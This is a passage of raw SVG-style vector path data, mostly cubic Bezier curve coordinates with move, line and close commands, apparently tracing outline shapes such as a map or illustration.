1155,110.59814 1156.1801,111 1157.6224,111 C 1159.9512,111 1160.0912,111.18623 1158.8724,112.66262 C 1157.8025,113.95881 1157.7755,114.41796 1158.75,114.74595 C 1161.1109,115.54057 1160.0781,118 1157.3834,118 C 1155.1275,118 1154.8331,118.34662 1155.2476,120.51503 C 1155.6445,122.59109 1155.2721,123.12929 1153.1142,123.59855 C 1148.4459,124.61375 1147.9018,124.94881 1148.2031,126.62303 C 1148.3852,127.63475 1147.7265,128.39302 1146.5,128.58361 C 1145.4,128.75454 1143.6,129.9854 1142.5,131.31884 C 1140.1937,134.11458 1136.3185,136.35569 1135.6978,135.2527 C 1134.5847,133.2749 1131.8733,119.93047 1132.1672,117.87651 C 1132.3502,116.59697 1133.4363,115.08528 1134.5807,114.51721 C 1135.7251,113.94914 1136.4945,112.98337 1136.2904,112.37106 C 1136.0862,111.75875 1137.8996,110.75911 1140.3199,110.14966 C 1142.7403,109.5402 1145.2517,108.40163 1145.9008,107.61951 C 1147.0315,106.2571 1155.5213,101.81106 1159.3134,100.59544 C 1160.3107,100.27572 1160.8672,99.5941 1160.5499,99.080736 C 1159.927,98.072912 1155.724,99.006978 1152.0612,100.96722 C 1149.4703,102.35384 1146.5688,101.56606 1147.2952,99.6732 C 1148.1544,97.434077 1139.4455,97.550496 1136.2212,99.821235 C 1134.7245,100.87524 1132.4875,102.05197 1131.25,102.43619 C 1128.5988,103.25935 1128.3395,104.53257 1130.6431,105.41655 C 1133.4096,106.47815 1131.6404,107.00927 1123.4,107.5909 C 1118.2675,107.95317 1115.9768,107.81505 1116.861,107.19662 C 1117.8545,106.50178 1117.2305,106.12898 1114.5503,105.81608 C 1112.5309,105.58032 1110.7044,105.66932 1110.4914,106.01386 C 1110.2785,106.35839 1104.9868,106.66781 1098.732,106.70144 C 1089.9382,106.74873 1086.5821,107.16124 1083.9299,108.52083 C 1082.0434,109.48786 1080.275,110.57932 1080,110.94631 C 1079.725,111.31329 1078.0375,112.20509 1076.25,112.92809 C 1074.4625,113.65109 1073,114.62894 1073,115.10109 C 1073,115.57324 1070.6375,117.31442 1067.75,118.97039 C 1062.9969,121.69624 1062.7659,121.98212 1065.309,121.99062 C 1067.1761,121.99685 1067.8788,122.38712 1067.4045,123.15451 C 1066.9589,123.87555 1067.1306,124.03733 1067.8618,123.58541 C 1068.5058,123.18743 1068.7929,122.47399 1068.5,122 C 1067.6492,120.62345 1070.0606,119.66062 1071.2871,120.88713 C 1072.1043,121.70429 1072.0811,122 1071.2,122 C 1070.54,122 1070,122.675 1070,123.5 C 1070,125.19092 1071.5645,125.51368 1072.4914,124.01396 C 1073.2485,122.78882 1076.33,123.19907 1078.2329,124.77837 C 1079.6908,125.98828 1082.033,126.44103 1085.3724,126.15844 C 1086.9799,126.02242 1087.0552,125.77142 1085.9043,124.38466 C 1084.7394,122.98109 1084.8217,122.825 1086.5318,123.19405 C 1087.6143,123.42765 1088.3717,124.20192 1088.2149,124.91465 C 1088.0581,125.62738 1088.3746,126.74639 1088.9181,127.40135 C 1089.4617,128.0563 1089.8374,129.5082 1089.7531,130.6278 C 1089.5552,133.25489 1092.8846,142 1094.0827,142 C 1094.5872,142 1095,142.46583 1095,143.03518 C 1095,143.74876 1094.3991,143.74876 1093.0657,143.03518 C 1088.031,140.34069 1085.4583,144.02621 1088.9505,148.93048 C 1090.2337,150.73252 1090.6445,152.1017 1090.0181,152.48881 C 1089.4581,152.83488 1089,152.64148 1089,152.05902 C 1089,150.36344 1086.276,150.83832 1085.5787,152.65546 C 1084.3119,155.95678 1092.2758,161.20204 1095.4943,159.18615 C 1096.0474,158.8397 1097.1178,158.4628 1097.8728,158.34858 C 1100.1826,157.99918 1105,155.79766 1105,155.09148 C 1105,154.72525 1105.9,154.35781 1107,154.27495 C 1108.1,154.19209 1108.9884,154.43383 1108.9742,154.81215 C 1108.9501,155.45452 1103.8565,157.95188 1099.6462,159.3856 C 1098.5245,159.76759 1098.0175,160.60332 1098.3624,161.50202 C 1098.7882,162.61157 1097.9092,163.1508 1094.8869,163.63408 C 1092.6619,163.98986 1090.3457,165.07478 1089.7398,166.045 C 1088.7934,167.56042 1088.3466,167.62429 1086.5691,166.49815 C 1085.4311,165.77716 1083.15,165.21026 1081.5,165.23837 C 1079.85,165.26648 1079.0716,165.48987 1079.7702,165.73479 C 1081.3056,166.27312 1085,173.65718 1085,176.18783 C 1085,177.18452 1084.1844,178.81562 1083.1875,179.8125 C 1082.1906,180.80937 1081.5582,182.17451 1081.782,182.84612 C 1082.0059,183.51774 1081.6888,184.67008 1081.0773,185.40687 C 1080.4658,186.14367 1080.2332,187.44403 1080.5603,188.29656 C 1081.1938,189.94753 1077.6538,192.52211 1076.0841,191.55199 C 1075.6031,191.25471 1074.9132,191.78379 1074.551,192.72772 C 1073.9865,194.19872 1073.7594,194.23362 1072.9615,192.97197 C 1072.3638,192.02681 1072.0251,191.93614 1072.0153,192.71862 C 1072.0068,193.39338 1071.3249,193.67816 1070.4873,193.35674 C 1069.6553,193.03747 1068.3053,193.33169 1067.4873,194.01057 C 1066.6693,194.68945 1066,194.86466 1066,194.39994 C 1066,193.93522 1065.3054,194.54668 1064.4564,195.75875 C 1063.1271,197.65666 1062.6232,197.79163 1060.8258,196.73126 C 1059.1655,195.75177 1058.6457,195.75688 1058.2839,196.75623 C 1058.0338,197.44716 1057.3493,197.71591 1056.7629,197.35346 C 1056.1764,196.991 1055.1115,197.49464 1054.3963,198.47265 C 1053.6812,199.45066 1052.4543,200.00457 1051.6699,199.70357 C 1049.9239,199.03358 1048,200.80544 1048,203.08337 C 1048,204.82525 1045.4421,205.99145 1043.2438,205.25183 C 1042.5528,205.01937 1042.213,204.46445 1042.4885,204.01867 C 1042.764,203.57289 1042.3398,201.95609 1041.5459,200.42578 C 1040.0948,197.62875 1040.3637,195.48871 1042.0364,196.52249 C 1042.5304,196.8278 1043.5076,196.16014 1044.2078,195.0388 C 1044.9081,193.91746 1045.8659,193 1046.3362,193 C 1046.8065,193 1048.4407,192.1103 1049.9679,191.02289 C 1051.7023,189.78787 1054.5995,188.98012 1057.6868,188.87085 C 1062.1035,188.71453 1062.8625,188.33986 1064.8237,185.34796 C 1066.0308,183.50658 1067.4908,182 1068.0682,182 C 1068.6456,182 1068.7927,182.52647 1068.395,183.16994 C 1067.902,183.96759 1068.2275,184.12669 1069.4177,183.66994 C 1070.378,183.30147 1071.3376,183 1071.5504,183 C 1071.7632,183 1071.6957,182.37052 1071.4004,181.60115 C 1071.1052,180.83178 1071.3443,179.90523 1071.9318,179.54213 C 1072.5193,179.17904 1073,179.42827 1073,180.09597 C 1073,180.85389 1073.743,180.6376 1074.9776,179.52023 C 1076.0654,178.53587 1076.9243,176.77863 1076.8864,175.61524 C 1076.8485,174.45186 1077.05,172.04335 1077.3343,170.263 C 1077.6185,168.48264 1077.4346,166.76859 1076.9255,166.45398 C 1075.4535,165.5442 1075.8521,164 1077.559,164 C 1078.4165,164 1078.8399,163.55 1078.5,163 C 1078.1601,162.45 1078.7782,162 1079.8736,162 C 1080.969,162 1082.1073,161.2125 1082.4032,160.25 C 1083.9515,155.21384 1085.0374,135.67849 1083.8737,133.79566 C 1082.8916,132.20657 1079.8545,134.72211 1080.122,136.90309 C 1080.6057,140.84647 1078.1469,144.76473 1070.1207,152.84083 C 1060.648,162.37234 1055.0888,165.61769 1050.108,164.52372 C 1048.1555,164.09487 1047,164.23532 1047,164.90149 C 1047,165.48471 1045.875,166.24425 1044.5,166.58936 C 1042.7642,167.025 1042,167.90149 1042,169.45653 C 1042,171.10225 1040.9391,172.17463 1038,173.5 C 1035.8,174.49206 1034,175.43536 1034,175.59622 C 1034,175.75708 1035.5729,177.60124 1037.4952,179.69435 C 1040.5928,183.06702 1041.7799,186.41012 1040.977,189.5 C 1040.8341,190.05 1040.7529,191.2875 1040.7964,192.25 C 1040.84,193.2125 1040.4271,194 1039.8788,194 C 1039.3306,194 1039.1827,193.51338 1039.5503,192.91862 C 1040.2663,191.76017 1035.9026,191.97912 1035,193.14694 C 1034.725,193.50276 1033.375,193.95276 1032,194.14694 C 1029.7423,194.46579 1029.5,194.16082 1029.5,191 C 1029.5,189.075 1029.1552,186.96859 1028.7337,186.3191 C 1028.3122,185.6696 1028.4247,184.85554 1028.9837,184.51008 C 1030.726,183.43324 1030.0954,181.74178 1028.142,182.25261 C 1027.1202,182.51983 1025.518,182.30977 1024.5817,181.78579 C 1023.0329,180.91904 1023.0178,180.62176 1024.4143,178.49043 C 1025.8908,176.23699 1025.8368,176.12306 1022.9944,175.49878 C 1020.8775,175.03381 1018.9029,175.48863 1016.031,177.10275 C 1011.3085,179.75691 1009.8953,178.9899 1012.1785,175.01179 C 1013.0809,173.43928 1013.5856,171.91893 1013.2999,171.63323 C 1012.6692,171.00256 1005.9121,174.52412 1005.0375,175.93932 C 1004.6941,176.49491 1003.3315,177.11457 1002.0094,177.31634 C 998.57811,177.83999 998.36028,179.79595 1001.6907,180.17786 C 1003.646,180.40208 1004.4578,181.03196 1004.3611,182.25 C 1004.1902,184.40306 1004.9168,184.44699 1007.7601,182.4555 C 1009.3048,181.37356 1010.4945,181.19428 1011.7326,181.85688 C 1013.5462,182.82752 1014.2027,183 1016.0833,183 C 1018.1243,183 1016.3969,185.31643 1014.0939,185.6679 C 1011.5077,186.06259 1006.1401,189.96316 1006.0553,191.50945 C 1006.0249,192.06465 1006.9,193.08097 1008,193.76793 C 1009.1,194.45489 1010,195.7285 1010,196.59818 C 1010,197.46786 1010.9785,198.97179 1012.1745,199.94024 C 1014.7262,202.00643 1015.2935,205.67338 1013.1867,206.48186 C 1011.7122,207.04766 1012.3575,208.5 1014.0833,208.5 C 1015.3286,208.5 1015.3822,208.98319 1014.5549,212.75 C 1014.1623,214.5375 1013.2385,216 1012.5021,216 C 1011.0325,216 1006.6667,222.46236 1006.6667,224.63771 C 1006.6667,225.38697 1006.3996,226 1006.0731,226 C 1005.7467,226 1004.3592,227.02735 1002.9898,228.283 C 998.38973,232.501 991.41225,235.9412 986.5,236.41318 C 985.95,236.46603 984.6,237.01045 983.5,237.62301 C 982.4,238.23557 979.8125,239.04137 977.75,239.41369 C 973.63931,240.15574 973.54419,240.2798 975.00014,243.00027 C 977.15258,247.02214 972.8197,252.01925 968.58801,250.3954 C 966.32654,249.52759 966.93076,245.83489 969.54855,244.52503 C 970.95363,243.82197 971.42479,242.87178 971.04855,241.5 C 970.5436,239.65898 969.48417,239.35959 965.21667,239.85194 C 964.51083,239.93337 962.32562,241.60771 960.36064,243.57269 L 956.78795,247.14538 L 958.90312,249.39688 C 960.06647,250.6352 960.83039,251.83999 960.60072,252.07419 C 960.37106,252.30838 961.70456,253.625 963.56405,255 C 965.42354,256.375 966.95733,258.025 966.97247,258.66667 C 966.98761,259.30833 967.50716,260.00239 968.12702,260.20901 C 968.74688,260.41563 969.60392,262.81563 970.03156,265.54234 C 970.94317,271.35505 969.74755,274.61656 965.85735,276.92908 C 964.4039,277.79309 961.11884,279.9625 958.55722,281.75 C 955.9956,283.5375 953.77523,285 953.62306,285 C 953.47089,285 953.55506,283.57821 953.81011,281.84047 C 954.18187,279.30751 953.97032,278.79741 952.74337,279.26824 C 951.18638,279.86571 947,276.27388 947,274.34054 C 947,272.69747 943.65621,270.2236 941.84004,270.52298 C 940.87733,270.68167 939.87891,269.89423 939.46309,268.6483 C 938.76961,266.57043 938.73073,266.58196 938.27723,269 C 938.01935,270.375 937.42122,271.97233 936.94804,272.54961 C 935.59965,274.19469 934.5013,282.42625 935.73165,281.66585 C 936.66223,281.09072 937.62998,282.84479 939.3992,288.31338 C 939.72187,289.31074 940.36624,289.89169 940.83113,289.60437 C 941.29602,289.31705 943.5492,290.82834 945.83819,292.96279 C 949.31747,296.20717 950.00061,297.47143 950.00374,300.67181 C 950.00579,302.77731 950.93004,306.01325 952.05763,307.86278 C 953.18521,309.71231 953.83406,311.49928 953.49951,311.83382 C 953.16497,312.16836 952.57822,312.00511 952.19563,311.47104 C 951.39822,310.35792 945.56938,307 944.43458,307 C 944.01833,307 945.33481,308.41543 947.36012,310.1454 C 949.98105,312.38414 950.87281,313.82538 950.45385,315.1454 C 950.13011,316.16543 950.34555,317 950.93261,317 C 951.51968,317 952,316.325 952,315.5 C 952,314.675 952.675,314 953.5,314 C 955.27053,314 955.44052,315.15948 953.89638,316.70362 C 953.16013,317.43987 953.11407,318.38141 953.75799,319.53204 C 954.41077,320.69848 954.949,320.89154 955.42063,320.12842 C 956.40679,318.53279 959,318.72448 959,320.39301 C 959,321.15917 959.66741,322.04213 960.48314,322.35516 C 962.16336,322.99992 961.43136,326.05652 959.67772,325.71838 C 958.97387,325.58267 958.5366,327.18408 958.52257,329.94883 C 958.50032,334.33507 958.55602,334.40938 962.48273,335.23155 C 964.67323,335.6902 966.90073,336.50073 967.43273,337.03273 C 968.71008,338.31008 973.71174,338.27542 974.51008,336.98369 C 974.85554,336.42472 975.6696,336.3042 976.3191,336.71587 C 976.96859,337.12755 979.75,337.7297 982.5,338.054 C 987.17822,338.60568 987.33911,338.71537 985,339.75842 L 982.5,340.87323 L 985.08333,340.93661 C 986.50417,340.97148 987.96489,341.29823 988.32939,341.66272 C 989.04796,342.38129 994.57495,343.26818 997,343.05405 C 1001.2897,342.67527 1003.3048,342.90483 1004.2838,343.8838 C 1005.9463,345.5463 1004.7564,346.0477 998.88834,346.15732 C 992.7448,346.27208 990.80885,345.92039 989.76531,344.5 C 989.32135,343.89571 989.02457,344.03697 989.01531,344.85699 C 989.00509,345.76307 988.4185,345.96809 987.25,345.474 C 986.2875,345.067 983.25,344.57305 980.5,344.37633 C 977.75,344.1796 974.375,343.59604 973,343.07952 C 971.625,342.56301 967.9125,341.85143 964.75,341.49824 C 961.5875,341.14506 959,340.43847 959,339.92804 C 959,339.41762 958.0449,339 956.87756,339 C 955.05871,339 954.94223,338.77454 956.06325,337.42378 C 957.14616,336.11897 957.12874,335.6976 955.96209,334.97657 C 955.14279,334.47021 954.31215,334.49492 953.978,335.0356 C 953.00724,336.60632 941.39089,324.81393 938.48533,319.30815 C 936.97839,316.45263 935.12771,313.87925 934.37272,313.58953 C 933.61772,313.29981 933,312.34632 933,311.47066 C 933,310.59501 930.075,307.02467 926.5,303.53659 C 920.23537,297.42426 918.41885,294 921.44098,294 C 922.23352,294 923.11447,294.3762 923.39864,294.836 C 923.68281,295.2958 924.88558,295.60052 926.07145,295.51315 C 927.45913,295.41092 930.12298,297.21965 933.54577,300.58818 C 938.78397,305.74332 943,308.18673 943,306.06739 C 943,305.48032 942.65985,305 942.24411,305 C 941.30607,305 939.47378,300.79513 938.0857,295.45703 C 936.95019,291.09018 933.46299,286.59582 931.94039,287.53684 C 930.89778,288.18121 930.68301,286.47201 931.05613,280.5 C 931.56608,272.33809 931.50295,267.81084 930.87377,267.42199 C 930.5179,267.20204 929.91077,265.3379 929.5246,263.27945 C 929.13844,261.22101 928.38576,258.72081 927.852,257.72346 C 926.92212,255.98597 926.7459,255.99392 923.63993,257.91352 C 921.68533,259.12153 919.52522,259.6886 918.19917,259.34183 C 916.98963,259.02553 916,258.70375 916,258.62677 C 916,258.54978 916.42559,257.00286 916.94575,255.18915 C 917.72999,252.45468 917.55921,251.55921 915.94575,249.94575 C 914.87559,248.87559 914,247.51538 914,246.92308 C 914,246.33077 912.65,244.49615 911,242.84615 C 909.35,241.19615 908,239.00733 908,237.98209 C 908,235.80496 906.35071,234.44787 905.7812,236.1564 C 905.39276,237.32173 904.18364,237.73304 898.5,238.63326 C 892.71073,239.55021 891.01271,240.04157 891.12428,240.76758 C 891.48543,243.11755 890.63097,244.25624 887.53607,245.54938 C 885.6309,246.34541 883.63604,247.78494 883.10303,248.74835 C 882.57002,249.71176 880.75508,251.4 879.06984,252.5 C 877.38459,253.6 876.00446,255.0625 876.00288,255.75 C 876.00129,256.4375 875.3801,257 874.62244,257 C 873.86479,257 872.66769,257.69548 871.96223,258.54551 C 871.25677,259.39554 870.0511,259.84985 869.28296,259.55509 C 868.18684,259.13447 867.91697,260.14669 868.0287,264.25958 C 868.107,267.14181 867.84526,271.43533 867.44705,273.80074 C 866.82376,277.50322 867.05531,278.47698 869.11152,280.80074 C 871.83977,283.88398 874,287.50126 874,288.98643 C 874,290.51408 870.20266,294 868.53854,294 C 866.52996,294 864.70268,286.91221 865.89963,283.76398 C 866.44758,282.32278 866.45882,280.75633 865.92725,279.91653 C 865.11671,278.636 864.57743,279.32371 864.88158,281.25 C 864.94671,281.6625 864.1,282 863,282 C 861.70435,282 861,282.66667 861,283.89301 C 861,288.30844 854.99802,285.93358 853.54743,280.94418 C 853.15659,279.59988 851.8093,276.25 850.55346,273.5 C 843.46559,257.97928 840.54455,249.02875 841.03703,244.34011 C 841.40744,240.81366 840.99728,238.45613 840.22467,239.67072 C 838.53899,242.3207 834.41279,242.21822 831.11639,239.44449 C 829.35624,237.96342 828.08347,236.24959 828.28801,235.63597 C 828.69281,234.42156 824.85813,231 823.09227,231 C 822.49152,231 822,230.51786 822,229.92857 C 822,226.8292 819.09066,225.94843 810.29563,226.38517 C 805.45803,226.6254 798.35391,226.29951 794.50869,225.66097 C 788.39262,224.64534 787.35215,224.154 786.1975,221.73616 C 784.98754,219.20252 784.70799,219.09112 782.84123,220.39865 C 780.64637,221.936 773.74183,221.62523 773.16667,219.96321 C 772.98333,219.43345 772.19583,219 771.41667,219 C 770.6375,219 770,218.55 770,218 C 770,217.45 769.08588,217 767.96862,217 C 766.85135,217 765.64976,216.2125 765.2984,215.25 C 764.21456,212.28095 761.57479,209.45514 760,209.57818 C 755.87642,209.90035 755.77975,209.98633 756.46623,212.72147 C 756.8419,214.21827 758.69069,216.93994 760.57464,218.76961 C 762.45859,220.59927 764,222.57971 764,223.17058 C 764,223.86051 764.53669,223.79948 765.5,223 C 766.325,222.31531 767.06793,222.14771 767.15095,222.62756 C 767.28734,223.41583 767.52177,225.38146 767.87364,228.68713 C 768.13109,231.10581 775.39487,228.83205 780.25,224.81298 L 785,220.88095 L 785,224.90529 C 785,229.05039 786.78163,231 790.56959,231 C 791.50518,231 793.33693,232.15053 794.64015,233.55673 C 796.5317,235.59774 796.79987,236.50543 795.96964,238.05673 C 795.39764,239.12553 794.47574,240 793.92098,240 C 793.36622,240 793.04455,240.7875 793.20616,241.75 C 793.40378,242.92694 792.84507,243.50602 791.5,243.51837 C 790.07883,243.53143 789.52298,244.18262 789.5794,245.76837 C 789.62343,247.0058 789.06219,248 788.31961,248 C 787.58306,248 786.20982,248.9 785.26797,250 C 784.32612,251.1 783.02867,252 782.38475,252 C 781.74082,252 780.95496,252.675 780.63837,253.5 C 780.32179,254.325 778.94482,255 777.57844,255 C 774.42693,255 770.00612,256.9843 769.9802,258.41052 C 769.95729,259.67073 758.60319,265.05927 752,266.94373 C 749.525,267.65006 746.59204,268.64677 745.48231,269.15863 C 744.37259,269.6705 742.48808,270.16286 741.29452,270.25277 C 738.44961,270.46707 737.73595,273.45106 740.03254,275.52945 C 741.71911,277.05577 742.54636,277.02865 751.67406,275.14782 C 757.07833,274.03423 762.625,272.84088 764,272.49594 C 766.30301,271.91819 766.50575,272.14576 766.57292,275.38397 C 766.61303,277.31732 766.27553,278.67029 765.82292,278.39056 C 765.37032,278.11083 764.9926,278.69602 764.98355,279.69098 C 764.9745,280.68594 763.87222,283.3 762.53403,285.5 C 761.19584,287.7 758.99816,291.53391 757.65029,294.0198 C 755.32126,298.31525 748.42606,305.31414 742.53283,309.3646 C 741.04073,310.39013 737.76323,313.87763 735.2495,317.1146 C 732.73576,320.35157 730.17494,323 729.55877,323 C 728.94261,323 727.89167,324.2375 727.22335,325.75 C 726.55503,327.2625 725.31516,329.99908 724.46807,331.83129 C 723.62099,333.6635 723.39414,334.87444 723.96396,334.52227 C 724.53378,334.1701 725,333.23352 725,332.44098 C 725,331.64844 725.47656,331 726.05902,331 C 726.64148,331 726.7785,331.54939 726.3635,332.22086 C 725.24645,334.02828 724.99618,342.1204 726.078,341.45179 C 726.5851,341.13839 727,341.35852 727,341.94098 C 727,342.52344 726.54143,343 725.98095,343 C 724.65174,343 725.84244,348.17691 727.47733,349.50596 C 728.20166,350.0948 728.9204,354.03401 729.21067,359.00596 C 729.83066,369.62541 727.65531,373.95597 720.92889,375.49287 C 719.51477,375.81597 716.98735,377.29976 715.3124,378.79017 C 713.63745,380.28057 711.43713,381.98789 710.4228,382.5842 C 708.6853,383.60567 708.66631,383.98361 710.09473,389.11559 C 712.23538,396.8065 711.17009,400.237 706.01193,402.26318 C 702.86161,403.50066 702,404.36124 702,406.27033 C 702,410.09613 699.96835,414.94657 697.90287,416.05198 C 696.86514,416.60736 695.22498,418.54474 694.25805,420.35729 C 690.03589,428.2719 678.33389,434.92185 669.5,434.42665 C 667.3,434.30333 663.28082,434.83188 660.5685,435.60121 C 657.85617,436.37055 655.60617,436.95213 655.5685,436.89362 C 655.53082,436.83511 654.36113,436.33293 652.96917,435.77766 z M 736.76168,263.3649 C 735.987,261.78921 735.53988,259.67002 735.76809,258.6556 C 736.00415,257.60624 734.85039,255.15294 733.0915,252.96424 C 731.39118,250.84841 730,248.73464 730,248.26698 C 730,247.79931 728.425,245.74688 726.5,243.70602 C 724.575,241.66516 722.94809,239.4339 722.88465,238.74768 C 722.43026,233.83282 720.86575,230.19816 718.99387,229.70865 C 717.98367,229.44447 716.17917,227.31137 714.98388,224.96841 C 712.14822,219.41005 708.47377,215.4244 707.55524,216.91062 C 707.17385,217.52772 706.39469,217.74393 705.82377,217.39108 C 705.1465,216.97251 705.04134,217.57506 705.52118,219.12477 C 706.60777,222.63409 709.82762,228.77543 710.94204,229.46418 C 711.47587,229.79411 711.6724,230.69013 711.37877,231.45533 C 711.07836,232.23818 711.77437,233.34406 712.97031,233.98411 C 715.58242,235.38207 717.34867,239.48739 717.08239,243.5419 C 716.94809,245.58686 717.5998,247.22554 719.0709,248.5419 C 720.27445,249.61885 722.08193,252.40564 723.08752,254.73476 C 724.33414,257.62216 725.37431,258.79359 726.35678,258.41659 C 727.14928,258.11247 728.09477,258.34433 728.45787,258.93183 C 728.82096,259.51932 728.52898,260.01368 727.80902,260.03041 C 726.99237,260.04938 727.15113,260.44023 728.23111,261.06953 C 729.18323,261.62432 731.41564,263.40573 733.19203,265.02821 C 736.95381,268.46407 738.8372,267.58649 736.76168,263.3649 z M 654.93384,207.03541 C 656.13456,206.3928 656.58648,205.28763 656.28768,203.72459 C 655.74182,200.86908 657.37114,199.38987 662.0187,198.52159 C 664.7338,198.01434 666.05689,198.31475 667.81205,199.837 C 669.08508,200.94109 672.93949,202.30658 676.56529,202.93799 C 680.12851,203.55849 684.21374,204.51096 685.64357,205.05459 C 687.47605,205.75129 688.66198,205.6955 689.66203,204.86553 C 691.31008,203.49777 698.0346,202.84478 699.5,203.91021 C 700.05,204.31009 701.74034,204.71408 703.25631,204.80795 C 705.71323,204.9601 706.32807,204.30095 708.91695,198.73932 C 712.58837,190.85209 712.67428,187.38605 709.21986,186.51904 C 707.82828,186.16978 706.42203,186.31374 706.09486,186.83895 C 705.10826,188.42274 701.69414,188.53975 698.2491,187.10783 C 695.67193,186.03664 694.69184,186.01086 693.51999,186.98341 C 692.44506,187.87552 691.25045,187.93435 689.14121,187.19907 C 686.83114,186.39378 685.88637,186.52506 684.50042,187.84396 C 683.20676,189.07505 682.86924,189.1369 683.1851,188.085 C 683.6256,186.61805 678.80194,181 677.10192,181 C 676.05947,181 676.26949,177.60575 677.49131,174.70687 C 678.44908,172.43447 678.06544,172.08499 674.10722,171.62413 C 671.79258,171.35463 671.01992,171.60952 671.3718,172.5265 C 672.11222,174.45601 670.9705,175.05458 668.78287,173.8838 C 665.52298,172.13915 665.84705,173.42117 669.69796,177.50386 C 672.36871,180.33535 672.97028,181.50991 671.92774,181.85742 C 671.14248,182.11917 670.48894,182.14583 670.47542,181.91667 C 670.4619,181.6875 669.73078,182.17263 668.85072,182.99474 C 667.97065,183.81684 667.46736,185.05434 667.73229,185.74474 C 668.01311,186.47656 667.43961,186.99361 666.35699,186.98469 C 664.05125,186.96567 661.5,185.41705 661.5,184.03647 C 661.5,183.46641 661.05,182.96173 660.5,182.91496 C 658.71076,182.76281 657.10681,180.88523 657.62112,179.54496 C 657.89735,178.82512 657.00265,177.02688 655.63289,175.54889 C 654.0964,173.89099 653.2109,171.83724 653.32121,170.18734 C 653.46465,168.04186 652.80793,167.17626 650,165.80977 C 648.075,164.87295 646.05,163.74502 645.5,163.30324 C 644.95,162.86146 643.2625,161.86146 641.75,161.08102 C 640.2375,160.30058 638.99311,159.40058 638.98469,159.08102 C 638.97627,158.76146 638.56056,157.85394 638.0609,157.0643 C 637.31111,155.87938 636.87918,155.85538 635.58805,156.92693 C 634.28529,158.00812 633.92017,157.95555 633.40484,156.61262 C 632.52671,154.32424 630.45482,154.61218 630.27133,157.0481 C 630.17426,158.33676 631.01524,159.50545 632.5393,160.19986 C 633.87154,160.80687 635.20386,162.06693 635.5,163 C 636.01098,164.60997 639.94812,167 642.08926,167 C 642.63659,167 643.62792,167.47668 644.29221,168.0593 C 644.95649,168.64191 647.02258,170.02183 648.88351,171.12579 C 651.19666,172.49802 651.9424,173.4576 651.24087,174.15913 C 650.53934,174.86066 649.52097,174.814 648.02171,174.01162 C 645.40147,172.60931 644.23789,173.37678 645.91692,175.39989 C 646.87969,176.55996 646.67319,177.36065 644.87908,179.42406 C 643.64722,180.84083 641.99734,182 641.21268,182 C 640.33977,182 640.01508,182.59691 640.37615,183.53785 C 641.34704,186.06795 638.49138,186.27384 633.5637,184.02902 C 628.11926,181.54879 628.35178,180.21838 634.25314,180.08435 C 640.80157,179.93563 641.95357,179.73389 641.39699,178.83333 C 641.11373,178.375 641.37436,178 641.97617,178 C 642.76049,178 642.76724,177.4336 642,176 C 641.4113,174.9 640.27047,174 639.46482,174 C 638.65917,174 638,173.52344 638,172.94098 C 638,172.35852 637.60099,172.12857 637.11331,172.42997 C 636.62563,172.73138 635.67053,172.30793 634.99086,171.48899 C 634.3112,170.67005 632.97996,170 632.03254,170 C 631.08513,170 629.50588,169.11149 628.5231,168.02553 C 627.54032,166.93957 625.94032,165.79844 624.96753,165.48969 C 623.99474,165.18094 622.92224,163.82631 622.58418,162.47939 C 621.6808,158.88002 618.31512,158.52835 612.35939,161.41104 C 607.95944,163.5407 606.6889,163.75289 603.54118,162.88376 C 599.32204,161.7188 596.91311,162.95174 597.67984,165.88372 C 598.02717,167.21189 597.26743,168.04288 594.82661,169.00451 C 592.99697,169.72535 590.05243,171.66803 588.28317,173.32158 C 585.32584,176.08551 585.20484,176.43323 586.78317,177.63221 C 588.37497,178.84141 588.37746,178.93871 586.81739,178.9682 C 585.89195,178.98569 584.84913,179.9 584.5,181 C 584.15087,182.1 583.27565,183 582.55506,183 C 581.83446,183 580.68469,183.675 580,184.5 C 579.26628,185.38408 577.06028,186.00629 574.62756,186.01531 C 565.90517,186.04767 565.93203,190.02402 574.65754,190.45337 C 577.3209,190.58442 580.175,190.14949 581,189.48685 C 581.825,188.82421 583.625,187.96321 585,187.57352 C 586.375,187.18382 589.075,186.42823 591,185.89442 C 594.09049,185.03743 610.8172,183.79333 621.21414,183.64716 C 625.70496,183.58402 627.11874,184.70879 624.73734,186.45011 C 623.16096,187.60279 623.13857,187.87011 624.52222,189.01844 C 625.89678,190.15922 625.82384,190.55862 623.859,192.65009 L 621.65137,195 L 623.8847,195 C 625.11304,195 625.88183,195.38218 625.59315,195.84929 C 624.80231,197.12888 629.61834,199.36043 631.56149,198.61478 C 633.96032,197.69426 639.88182,200.05227 640.56329,202.19941 C 640.92592,203.34194 642.11518,204.00192 643.81739,204.00526 C 645.29282,204.00816 647.85,204.87527 649.5,205.93217 C 653.16662,208.2808 652.76077,208.1984 654.93384,207.03541 z M 700.00836,193.03114 C 697.89526,191.68838 699.68426,190.37032 704.5,189.72186 C 706.7,189.42562 707.9375,189.40451 707.25,189.67495 C 706.5625,189.9454 706,190.80417 706,191.58333 C 706,192.3625 705.5868,193 705.08179,193 C 704.57677,193 703.56427,193.22027 702.83179,193.4895 C 702.0993,193.75872 700.82876,193.55246 700.00836,193.03114 z M 670.01008,191.10761 C 668.64063,190.72645 667.96614,190.13896 668.51122,189.80208 C 669.91791,188.9327 679,190.08257 679,191.13005 C 679,192.13558 673.65546,192.12224 670.01008,191.10761 z M 590,178 C 590,177.45 590.45,177 591,177 C 591.55,177 592,177.45 592,178 C 592,178.55 591.55,179 591,179 C 590.45,179 590,178.55 590,178 z M 615.70044,178.26631 C 615.45967,177.84484 614.95946,175.81929 614.58886,173.76508 C 614.0445,170.74777 614.19196,170.13643 615.35637,170.58326 C 617.053,171.23432 618.50003,169.42707 617.01631,168.51008 C 615.23543,167.40944 615.92409,164.25311 618.0674,163.69263 C 619.80825,163.23738 620.10148,163.57435 619.92389,165.826 C 619.80789,167.2967 620.03612,169.24949 620.43106,170.16553 C 621.39532,172.40203 620.75,177.49617 619.5,177.51531 C 618.95,177.52373 617.96859,177.86858 617.3191,178.28162 C 616.6696,178.69467 615.9412,178.68778 615.70044,178.26631 z M 594.54271,176.0691 C 593.77659,174.8295 595.73885,173.68581 597.48328,174.35521 C 598.24641,174.64805 599.03892,174.38325 599.24441,173.76677 C 599.46316,173.11051 600.16411,172.98339 600.93545,173.46011 C 601.87981,174.04375 601.33502,174.66025 599.01163,175.63716 C 595.15968,177.25678 595.27014,177.24611 594.54271,176.0691 z M 773.75,185.01365 C 775.59185,184.99353 775.37109,178.07963 773.50574,177.36383 C 772.6839,177.04846 772.26046,176.38758 772.56476,175.89522 C 772.86906,175.40285 772.60927,175 771.98745,175 C 771.36563,175 770.98769,173.9875 771.14758,172.75 C 771.30747,171.5125 